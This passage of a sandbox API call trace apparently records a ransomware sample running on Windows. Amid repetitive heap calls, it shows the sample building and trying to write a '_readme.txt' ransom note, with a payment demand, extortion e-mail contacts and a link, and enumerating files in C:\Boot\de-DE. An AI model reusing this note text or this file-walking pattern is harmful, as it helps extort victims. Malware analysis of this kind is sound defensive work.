[0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.555] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.555] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.555] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.555] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.555] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0165.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.555] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.555] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.555] PathFindFileNameW (pszPath="") returned="" [0165.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.555] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.556] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.556] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.556] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.556] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.556] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.556] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.556] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0165.556] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.556] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.556] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0165.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.557] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.557] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.557] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.557] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.558] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.558] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.558] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.558] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.558] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 